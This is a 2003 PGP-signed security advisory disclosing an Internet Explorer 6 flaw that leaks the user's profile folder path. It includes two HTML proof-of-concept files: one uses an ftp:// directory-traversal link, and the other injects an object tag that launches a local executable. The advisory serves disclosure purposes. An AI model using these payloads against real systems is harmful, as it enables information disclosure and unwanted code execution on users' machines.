-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Title: ~~~~~~~~~~~~~~~~~ Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability [http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html] Date: ~~~~~~~~~~~~~~~~~ 5 June 2003 Author: ~~~~~~~~~~~~~~~~~ Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp] Vulnerable: ~~~~~~~~~~~~~~~~~ Windows2000 SP3 Internet Explorer 6.0 SP1 Overview: ~~~~~~~~~~~~~~~~~ A remote attacker is able to gain access to the path of the %USERPROFILE% folder without guessing a target user name by this vulnerability. ex.) %USERPROFILE% = "C:\Documents and Settings\victim" Details: ~~~~~~~~~~~~~~~~~ This vulnerability is in the address of a "Cannot find server" page. The address of a "Cannot find server" page is "res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and Settings\%USERNAME%\Desktop\ftp:\\%@\". Exploit code: ~~~~~~~~~~~~~~~~~ ************************************************** This exploit reads %TEMP%\exploit.html. You need to create it. And click on the "Exploit" link on the ftpexp.html. ************************************************** [exploit.html] <html> <script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script> </html> [ftpexp.html] <html> <a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a> </html> Workaround: ~~~~~~~~~~~~~~~~~ None. Vendor Status: ~~~~~~~~~~~~~~~~~ Microsoft was notified on 7 November 2002. A patch will be released to fix this bug in the future. - ------------------------------------------------------ Eiji "James" Yoshida penetration technique research site E-mail: ptrs-ejy@bp.iij4u.or.jp URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm - ------------------------------------------------------ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8ckt Comment: Eiji James Yoshida iQA/AwUBPt8y+vfWv13kjJq0EQJ+tgCeKwVv/+MtKD2zGtp29pjwlDR119MAoJOk ABdf8AVY3NtdcBgzsS7VHm+J =52pX -----END PGP SIGNATURE-----
